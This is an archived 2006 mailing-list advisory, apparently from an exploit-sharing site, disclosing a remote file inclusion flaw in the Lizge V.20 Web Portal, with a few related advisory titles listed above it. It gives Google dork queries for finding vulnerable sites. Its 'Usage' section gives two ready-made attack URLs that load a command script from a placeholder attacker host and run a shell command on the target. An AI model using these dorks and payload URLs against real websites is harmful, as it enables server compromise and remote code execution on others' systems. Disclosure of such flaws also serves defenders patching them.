Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[Full-disclosure] [scip_Advisory 2456] Horde Framework and Horde IMP /index.php cross site referencing

[Full-disclosure] [scip_Advisory 2457] Horde Framework and Horde IMP /horde/imp/search. php cross site scripting

local file include in PHP-Nuke (autohtml. php)

otopholder 1.8 suffers from a local file inclusion,XSS and directory listing vuln

From:	crackers_child_(at)_sibersavascilar.com <crackers_child_(at)_sibersavascilar.com>
Date:	16.08.2006
Subject:	Lizge V.20 Web Portal File Include Vulnerability

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------


Title : Lizge V.20 Web Portal File Include Vulnerability

--------------------------------------------------------------------------------

#Author: Crackers_Child


#cont@ct: crackers_child@sibersavascilar.com

--------------------------------------------------------------------------------

Affected software description :
--------------------------------------------------------------------------------

Application :  Lizge V.20 Web Portal
URL :  http://www.lizge.com

--------------------------------------------------------------------------------


dork        :allinurl:"index.php?lizge=
           :allinurl:"index.php?bade=
          
--------------------------------------------------------------------------------


Usage:

http://[target]/[lizge_path]//index.php?lizge=http://[evilhost]/cmd.
txt?&cmd=ls

http://[target]/[lizges_path]//index.php?bade=http://[evilhost]/cmd.
txt?&cmd=ls

--------------------------------------------------------------------------------


greets:

X_ALPEREN_X,Root_MOr And All Other Friends

--------------------------------------------------------------------------------




--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------